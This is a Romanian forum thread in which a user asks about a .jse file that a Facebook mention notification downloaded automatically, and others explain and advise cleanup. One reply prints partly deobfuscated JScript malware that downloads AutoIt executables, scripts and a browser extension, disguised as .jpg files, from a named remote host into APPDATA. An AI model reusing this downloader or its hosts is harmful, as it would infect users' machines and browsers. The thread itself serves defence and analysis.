Script de pe facebook

Avalon

Avalon

Member
Registered
Banned
Salutare baieti,
Stateam pe fb si mi-a aparut o notificare cum ca cineva ma mentionat intr-un comentariu, iar cand am dat s-o deschida mi-a downloadat automat un fisier: comment_88702036.jse
continutul e aici : Stie cineva ce naiba e ?:) mersi.
 
Uite aici codul decodat.
Cod: 
var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\","
        ExpandEnvironmentStrings ","
        Mozila ","
        https: //www.google.com","http://userexperiencestatics.net/ext/Autoit.jpg","\autoit.exe","http://userexperiencestatics.net/ext/bg.jpg","\bg.js","http://userexperiencestatics.net/ext/ekl.jpg","\ekl.au3","http://userexperiencestatics.net/ext/ff.jpg","\ff.zip","http://userexperiencestatics.net/ext/force.jpg","\force.au3","http://userexperiencestatics.net/ext/sabit.jpg","\sabit.au3","http://userexperiencestatics.net/ext/manifest.jpg","\manifest.json","http://userexperiencestatics.net/ext/run.jpg","\run.bat","http://userexperiencestatics.net/ext/up.jpg","\up.au3","http://whos.amung.us/pingjs/?k=pingjse346","\ping.js","http://whos.amung.us/pingjs/?k=pingjse3462","\ping2.js",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3||  !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix=  new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso=  new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1=  new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor))

Se pare ca iti descarca un executabil care vrea sa instaleze ceva.
Din ce am gasit pe google, iti infecteaza browserul prin instalarea unei extensii.
http://security.stackexchange.com/q...cked-me-into-downloading-an-obfuscated-script
La fel poti cauta mai multe pe google.
Cel mai bine este sa verifici la sectiunea extensii si sterge tot ce nu ai instalat tu. Mai poti chiar sterge/dezinstal browserul si apoi reinstall.
Recomanda o scanare cu malwarebytes si avg.

Niciodata nu da click pe acele posturi unde ai tag.
 
Uite aici cineva a postat mai multe info care te pot ajuta.
Pana nu scapi de acest program/extensie iti recomandat sa te deloghezi de pe facebook, google si alte retele, pentru ca va trimite link sa infecteze si pe altii.
image.png
 
Trebuie să te autentifici sau să te înregistrezi pentru a răspunde aici.

Reclama

Reclama

Cateva Topicuri VIP Club
  1. Cum cresti sau mentii CPC/ RPM mare pe adsense
  2. appmagic pro - plugin care face aplicatie pentru site tau
  3. SEO Rank Math plugin in premiera pe roforum
  4. Pulgin Legacy Admin
  5. Content Locker Plugin wordpress
  6. Facebook Store Generator
  7. Facebook Viral App 2 Script
  8. Gold MOVIES Script Filme Online
  9. Newspaper 9
  10. Tema Full Site Escorte

Stiri Monezi Virtuale

Reducere pentru Vacanta

Loading...
Back
Sus